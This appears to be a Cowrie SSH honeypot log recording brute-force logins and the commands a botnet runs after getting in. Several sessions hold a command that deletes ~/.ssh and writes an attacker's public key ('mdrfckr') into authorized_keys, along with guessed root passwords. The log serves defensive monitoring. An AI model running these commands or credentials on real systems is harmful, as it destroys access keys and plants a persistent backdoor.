{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60324,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3c483489bf4","protocol":"ssh","message":"New connection: 212.227.235.229:60324 (1.2.3.4:22) [session: f3c483489bf4]","sensor":"my-vps","timestamp":"2025-09-09T06:25:56.572692Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:25:56.577059Z","src_ip":"212.227.235.229","session":"f3c483489bf4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:25:56.687073Z","src_ip":"212.227.235.229","session":"f3c483489bf4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:25:57.137026Z","src_ip":"212.227.235.229","session":"f3c483489bf4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:57.255551Z","src_ip":"212.227.235.229","session":"f3c483489bf4"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:57.256576Z","src_ip":"212.227.235.229","session":"04fc68f8324e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:25:58.628910Z","src_ip":"212.227.235.229","session":"6d3fc0b1141e"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:00.011162Z","src_ip":"212.227.235.229","session":"6d3fc0b1141e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49865,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bc9f9fcf33a","protocol":"ssh","message":"New connection: 212.227.235.229:49865 (1.2.3.4:22) [session: 6bc9f9fcf33a]","sensor":"my-vps","timestamp":"2025-09-09T06:26:00.397077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:26:00.397860Z","src_ip":"212.227.235.229","session":"6bc9f9fcf33a"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:26:00.827996Z","src_ip":"212.227.235.229","session":"6bc9f9fcf33a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:26:02.352430Z","src_ip":"212.227.235.229","session":"6bc9f9fcf33a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54538,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6e75c9b935a","protocol":"ssh","message":"New connection: 212.227.235.229:54538 (1.2.3.4:22) [session: e6e75c9b935a]","sensor":"my-vps","timestamp":"2025-09-09T06:26:02.636589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:26:02.637733Z","src_ip":"212.227.235.229","session":"e6e75c9b935a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:02.738137Z","src_ip":"212.227.235.229","session":"6bc9f9fcf33a"}
{"eventid":"cowrie.session.closed","duration":"12.9","message":"Connection lost after 12.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:02.739288Z","src_ip":"212.227.235.229","session":"19546a706ee4"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:26:02.880858Z","src_ip":"212.227.235.229","session":"e6e75c9b935a"}
{"eventid":"cowrie.login.success","username":"root","password":"Az.123456","message":"login attempt [root/Az.123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:26:03.894003Z","src_ip":"212.227.235.229","session":"e6e75c9b935a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:26:04.463894Z","src_ip":"212.227.235.229","session":"e6e75c9b935a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:26:04.464616Z","src_ip":"212.227.235.229","session":"e6e75c9b935a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:26:04.465736Z","src_ip":"212.227.235.229","session":"e6e75c9b935a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:04.958635Z","src_ip":"212.227.235.229","session":"e6e75c9b935a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:26:05.223772Z","src_ip":"212.227.235.229","session":"e6e75c9b935a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:26:05.224612Z","src_ip":"212.227.235.229","session":"e6e75c9b935a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:26:05.470806Z","src_ip":"212.227.235.229","session":"e6e75c9b935a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:05.471777Z","src_ip":"212.227.235.229","session":"e6e75c9b935a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55374,"dst_ip":"1.2.3.4","dst_port":22,"session":"80a229fc1234","protocol":"ssh","message":"New connection: 212.227.235.229:55374 (1.2.3.4:22) [session: 80a229fc1234]","sensor":"my-vps","timestamp":"2025-09-09T06:26:05.709080Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:26:05.710051Z","src_ip":"212.227.235.229","session":"80a229fc1234"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:26:05.952154Z","src_ip":"212.227.235.229","session":"80a229fc1234"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:26:06.963150Z","src_ip":"212.227.235.229","session":"80a229fc1234"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:08.207607Z","src_ip":"212.227.235.229","session":"80a229fc1234"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56260,"dst_ip":"1.2.3.4","dst_port":22,"session":"6153d42dd715","protocol":"ssh","message":"New connection: 212.227.235.229:56260 (1.2.3.4:22) [session: 6153d42dd715]","sensor":"my-vps","timestamp":"2025-09-09T06:26:08.451965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:26:08.452952Z","src_ip":"212.227.235.229","session":"6153d42dd715"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:26:08.694976Z","src_ip":"212.227.235.229","session":"6153d42dd715"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:26:09.706847Z","src_ip":"212.227.235.229","session":"6153d42dd715"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:09.949040Z","src_ip":"212.227.235.229","session":"e6e75c9b935a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:09.950318Z","src_ip":"212.227.235.229","session":"6153d42dd715"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52204,"dst_ip":"1.2.3.4","dst_port":22,"session":"6699712c501d","protocol":"ssh","message":"New connection: 212.227.235.229:52204 (1.2.3.4:22) [session: 6699712c501d]","sensor":"my-vps","timestamp":"2025-09-09T06:26:14.196592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:26:14.204957Z","src_ip":"212.227.235.229","session":"6699712c501d"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:26:14.574226Z","src_ip":"212.227.235.229","session":"6699712c501d"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":49972,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d5456641c8a","protocol":"ssh","message":"New connection: 157.20.207.165:49972 (1.2.3.4:22) [session: 0d5456641c8a]","sensor":"my-vps","timestamp":"2025-09-09T06:26:16.047558Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:26:16.048500Z","src_ip":"157.20.207.165","session":"0d5456641c8a"}
{"eventid":"cowrie.login.success","username":"root","password":"warren","message":"login attempt [root/warren] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:26:16.133304Z","src_ip":"212.227.235.229","session":"6699712c501d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:26:16.231320Z","src_ip":"157.20.207.165","session":"0d5456641c8a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:26:16.952078Z","src_ip":"212.227.235.229","session":"6699712c501d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:26:16.952819Z","src_ip":"212.227.235.229","session":"6699712c501d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:26:16.953933Z","src_ip":"212.227.235.229","session":"6699712c501d"}
{"eventid":"cowrie.login.failed","username":"test","password":"123123","message":"login attempt [test/123123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:26:17.007590Z","src_ip":"157.20.207.165","session":"0d5456641c8a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:17.686840Z","src_ip":"212.227.235.229","session":"6699712c501d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:26:18.164010Z","src_ip":"212.227.235.229","session":"6699712c501d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:26:18.164722Z","src_ip":"212.227.235.229","session":"6699712c501d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:18.192229Z","src_ip":"157.20.207.165","session":"0d5456641c8a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:26:18.541424Z","src_ip":"212.227.235.229","session":"6699712c501d"}
